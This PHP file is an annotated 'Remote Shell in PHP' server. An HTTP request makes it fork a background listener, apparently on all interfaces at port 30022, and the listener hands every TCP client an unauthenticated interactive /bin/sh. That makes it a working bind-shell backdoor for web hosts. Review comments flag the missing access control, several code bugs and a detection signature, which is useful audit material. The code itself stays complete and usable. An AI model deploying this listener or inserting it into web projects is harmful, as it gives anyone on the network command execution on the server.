<?

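// Web invocation: none of the CLI environment markers (USER, PWD, TERM) is set
// and no extra command-line argument was passed. The script then re-launches
// itself in the background through the php CLI and ends the HTTP request.
// NOTE(review): nothing in this branch authenticates or authorizes the HTTP
// caller before a listener process is started; access control has to be
// enforced in front of this script.
if (
	empty($_SERVER["USER"]) && empty($_SERVER["PWD"]) && empty($_SERVER["TERM"])
	&& !( isset($_SERVER["argv"]) && is_array($_SERVER["argv"]) && count($_SERVER["argv"]) > 1 )
)
{
	// Request parameters are untrusted. Accept only a literal IP address and a
	// decimal TCP port (or an empty value, which lets the CLI defaults apply).
	$reqIp = isset($_REQUEST["ip"]) ? $_REQUEST["ip"] : "";
	$reqPort = isset($_REQUEST["p"]) ? $_REQUEST["p"] : "";
	if ( !is_string($reqIp) || ( $reqIp !== "" && filter_var($reqIp, FILTER_VALIDATE_IP) === false ) )
	{
		die(" BAD IP ");
	}
	if ( !is_string($reqPort) || ( $reqPort !== "" && ( !preg_match('/^[0-9]{1,5}\z/', $reqPort) || (int) $reqPort > 65535 ) ) )
	{
		die(" BAD PORT ");
	}

	// Every dynamic part of the command line is quoted with escapeshellarg() so
	// it reaches the CLI as exactly one argument and is never parsed by the shell.
	// The script name is taken from __FILE__ because PHP_SELF can carry
	// client-supplied path information.
	exec("php ".escapeshellarg(basename(__FILE__))." ".escapeshellarg($reqIp)." ".escapeshellarg($reqPort)."  & ");
	die(" RUN FORKED ");
}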


/**
 * Remote Shell in PHP
 *
 * This class is an example of a server created using the pserver class
 *
 * @package pserver
 * @subpackage pserver.example
 * @author Pedro Vargas (hide@address.com) http://deerme.org
 * @version 0.1
 * @licence GNU General Public License (GPL)
 */

require('pserver.class.php'); 

 
/**
 * pserver subclass that attaches every connected client to its own shell process.
 *
 * readData() forwards bytes received from a client to the stdin of a process
 * started with proc_open($this->shell); writeData() copies that process's
 * stdout and stderr back to the client's socket.
 *
 * Security-relevant properties visible in this class:
 *  - Client data goes to the shell's stdin with no authentication, authorization
 *    or filtering step in this class. Whether pserver adds any is not visible
 *    here; confirm against pserver.class.php.
 *  - Output is written to the socket with socket_write() as-is; no transport
 *    encryption is applied in this class.
 *  - The shell is started by proc_open() from this PHP process, so it runs with
 *    that process's operating-system privileges.
 *  - At runtime this appears as a php process with "/bin/sh -i" child processes,
 *    which is a useful signature when auditing hosts for this script.
 */
class pshell extends pserver
{
	
	// Descriptor spec handed to proc_open(): the child reads its stdin from
	// pipe 0 and writes its stdout and stderr to pipes 1 and 2.
	var $pipes = array(
			0 => array("pipe", "r"),
			1 => array("pipe", "w"),
			2 => array("pipe", "w")
			);

	// Command line started once per client (interactive Bourne shell).
	var $shell = "/bin/sh -i";
	// Maximum number of bytes taken from a pipe by each fread() call.
	var $chunk_size = 4096;
	// NOTE(review): not read in this class; presumably consumed by pserver - confirm.
	var $socketbinary = true;

	/**
	 * Forward data received from a client to that client's shell process.
	 *
	 * On the first call for a client (no "shell" key yet) the shell is started
	 * and its three pipes are switched to non-blocking mode.
	 *
	 * NOTE(review): when proc_open() fails, the failure is logged but execution
	 * continues into stream_set_blocking() and fwrite() on pipes that were never
	 * created.
	 *
	 * @param string $data   Bytes received from the client; written unmodified to
	 *                       the shell's stdin (assumed to be a string - confirm in pserver).
	 * @param array  $client Per-client state, passed by reference; gains the keys
	 *                       "shell" (process resource) and "pipes" (pipe handles).
	 */
	function readData( $data , &$client  )
	{		
		// Have a shell ?
		if ( !isset( $client["shell"] ) )
		{			
			$client["shell"] = proc_open($this->shell, $this->pipes,$client["pipes"]);
			if (!is_resource($client["shell"]))
			{
				$this->logger("Shell","Can't open shell ".$this->shell."  ");
			}
			// Set everything to non-blocking
			stream_set_blocking($client["pipes"][0],0);
			stream_set_blocking($client["pipes"][1],0);
			stream_set_blocking($client["pipes"][2],0);			
		}
		// Data Client -> Process
		fwrite($client["pipes"][0], $data);
		// Pause 10 ms after handing the data to the shell.
		usleep(10000);			
		
	}
	
	/**
	 * Relay the shell's stdout and stderr to the client's socket.
	 *
	 * When pcntl_fork() exists and the client has no "pid" entry yet, a child
	 * process is forked that relays output in an endless loop. In every other
	 * case (no pcntl, or a "pid" entry is already set) one chunk of stdout and
	 * one chunk of stderr are relayed per call.
	 *
	 * @param mixed $data   Not used by this method.
	 * @param array $client Per-client state, passed by reference; reads
	 *                      "pipes" and "socket", may set "pid".
	 */
	function writeData( $data , &$client)
	{
		// If we can read from the process's STDOUT
		// send data down tcp connection		
		
		if ( !isset( $client['pid'] ) AND  function_exists("pcntl_fork") )
		{
			$client['pid'] = pcntl_fork();
			// NOTE(review): $pid is never assigned in this method, so this
			// comparison does not test the value returned by pcntl_fork(). A
			// failed fork (-1) is truthy and falls into the parent branch below,
			// where -1 is appended to $this->pids. The intended operand looks
			// like $client['pid'].
			if($pid == -1)
			{
				$this->logger("Process","Could not fork Process");
				die();
			}
			else if ($client['pid'])
			{	
				// Parent process: remember the child's PID.
				$this->pids[] = $client['pid'];
			}
			else
			{
				// Child process: relay shell output until the socket write fails.
				while( 1 == 1)
				{
					// stdout chunk: newlines are rewritten to "\n\r" and the chunk
					// is written to the socket even when it is empty.
					$input = fread($client["pipes"][1], $this->chunk_size);
					$input = str_replace("\n","\n\r",$input);
					// @ hides the PHP warning; the false return value is what is checked.
					if ( @socket_write($client['socket'], $input  ) === false )
					{					
						// Dead socket
						$this->logger("Socket","Dead Socket");
						socket_close($client['socket']);
						unset($client);
						// Die Process
						die();
					}
					
					// stderr chunk, same newline rewrite.
					$input = fread($client["pipes"][2], $this->chunk_size);
					$input = str_replace("\n","\n\r",$input);
					if ( $input != "" )
					{
						// A 16-byte chunk containing "sh" is cut to its first 8 bytes -
						// presumably to collapse a doubled shell prompt; confirm.
						// NOTE(review): eregi() was removed in PHP 7.0.
						if ( eregi("sh" , $input ) and strlen($input) == 16 )
							$input = substr( $input , 0 , 8 );
						if ( @socket_write($client['socket'], $input  ) === false )
						{
							// A failed stderr write is deliberately left unhandled here.
						}
					}
					// Poll interval: 10 ms.
					usleep(10000);
				}
			}
		}
		else
		{
			// I cant Fork
			$input = fread($client["pipes"][1], $this->chunk_size);
			$input = str_replace("\n","\n\r",$input);			
			if ( $input != "" )
			{
				// Same 16-byte / 8-byte trim as in the forked loop.
				// NOTE(review): eregi() was removed in PHP 7.0.
				if ( eregi("sh" , $input ) and strlen($input) == 16 )
					$input = substr( $input , 0 , 8 );
				if ( socket_write($client['socket'], $input  ) === false )
				{
					$this->logger("Socket","Dead Socket");
					socket_close($client['socket']);
					// NOTE(review): after this unset the stderr section below still
					// reads $client["pipes"][2] and $client['socket'].
					unset($client);
				}
			}
			$input = fread($client["pipes"][2], $this->chunk_size);
			$input = str_replace("\n","\n\r",$input);			
			if ( $input != "" )
			{
				if ( eregi("sh" , $input ) and strlen($input) == 16 )
					$input = substr( $input , 0 , 8 );
				if ( socket_write($client['socket'], $input  ) === false )
				{
					// A failed stderr write is deliberately left unhandled here.
					
				}
			}
		}		
		
	}
	
	
	
}

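// Bind address and port come from the command line. A missing or empty
// argument falls back to 0 for the address and 30022 for the port; empty()
// keeps that fallback without reading an undefined $argv offset.
// NOTE(review): how pserver interprets an address of 0 is not visible here -
// presumably "listen on all interfaces"; confirm, and pass an explicit
// loopback address when the listener must not be reachable from the network.
$ip = ( !empty($argv[1]) ? $argv[1] : 0 );
$p = ( !empty($argv[2]) ? $argv[2] : 30022 );

// Instance Server
$server = new pshell($ip,$p);
// The base64 literal decodes to a PHP-serialized string ("s:338:...") holding
// the ANSI-coloured welcome banner. It is a constant in this file, so
// unserialize() is not fed external data here; a plain string literal would
// make the content reviewable without decoding.
$server->msg_welcome = unserialize(base64_decode("czozMzg6IhtbMTszMjs0MG1XZWxjb21lIHRvIFBIUCBQU2VydmVyG1sxOzM1OzQwbQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgIC98Xw0KICAgICAgICAgICAgICAgICAgICAgICAgLCcgIC5cDQogICAgICAgICAgICAgICAgICAgICwtLScgICAgXywnDQogICAgICAgICAgICAgICAgICAgLyAgICAgICAvDQogICAgICAgICAgICAgICAgICAoICAgLS4gIHwNCiAgICAgICAgICAgICAgICAgIHwgICAgICkgfA0KICAgICAgICAgICAgICAgICAoYC0uICAnLS0uKQ0KICAgICAgICAgICAgICAgICAgYC4gKS0tLS0nDQobWzE7MzI7NDBtCQkJIFBsZWFzZSwgdGFrZSBhIGNhdCAuLi4gG1sxOzM3OzQwbQoNIjs="));
$server->start();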

?>